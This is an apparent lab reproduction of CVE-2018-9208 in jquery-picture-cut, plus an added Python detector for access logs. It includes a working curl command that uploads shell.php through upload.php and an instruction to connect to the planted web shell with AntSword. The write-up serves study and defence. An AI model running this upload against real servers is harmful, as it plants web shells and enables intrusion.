jquery-picture-cut arbitrary file upload (CVE-2018-9208)


Upload endpoint: http://192.168.85.130:21826/jquery-picture-cut/src/php/upload.php



Upload request: curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://192.168.85.130:21826/jquery-picture-cut/src/php/upload.php



Connect with AntSword (中国蚁剑): http://192.168.85.130:21826/exp.php
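
The sequence above (a POST to upload.php, then requests to a script that did not exist before) leaves a recognizable trace in the web server's access log. The following detector is an added example, not part of the original write-up; it assumes combined-format access logs, and the sample lines, client addresses and timestamps are constructed.

```python
import re

# Constructed sample access-log lines for illustration (not from the original page).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Apr/2018:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
198.51.100.7 - - [10/Apr/2018:10:00:05 +0000] "POST /jquery-picture-cut/src/php/upload.php HTTP/1.1" 200 88
198.51.100.7 - - [10/Apr/2018:10:00:09 +0000] "POST /exp.php HTTP/1.1" 200 0
203.0.113.9 - - [10/Apr/2018:10:01:00 +0000] "GET /index.php HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
UPLOAD_SUFFIX = "/jquery-picture-cut/src/php/upload.php"


def find_suspect_uploads(log_text):
    """Flag .php paths first requested after a successful POST to upload.php."""
    seen_scripts = set()   # script paths already observed in the log
    last_upload = None     # (client, timestamp) of the most recent upload POST
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, ts, method, url, status = m.groups()
        path = url.split("?", 1)[0]
        if path.endswith(UPLOAD_SUFFIX):
            seen_scripts.add(path)  # the uploader itself is a known script
            if method == "POST" and status.startswith("2"):
                last_upload = (client, ts)
            continue
        if not path.lower().endswith(".php"):
            continue
        # A script that answers (not 404) but was never seen before the upload
        # is a candidate for a file written through the upload handler.
        if last_upload and path not in seen_scripts and status != "404":
            alerts.append({"script": path, "client": client, "time": ts,
                           "upload_by": last_upload[0],
                           "upload_time": last_upload[1]})
        seen_scripts.add(path)
    return alerts


if __name__ == "__main__":
    for alert in find_suspect_uploads(SAMPLE_LOG):
        print(alert)
```

A hit only says the script was first served after an upload; confirm it by comparing the file's modification time on disk with the upload timestamp.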
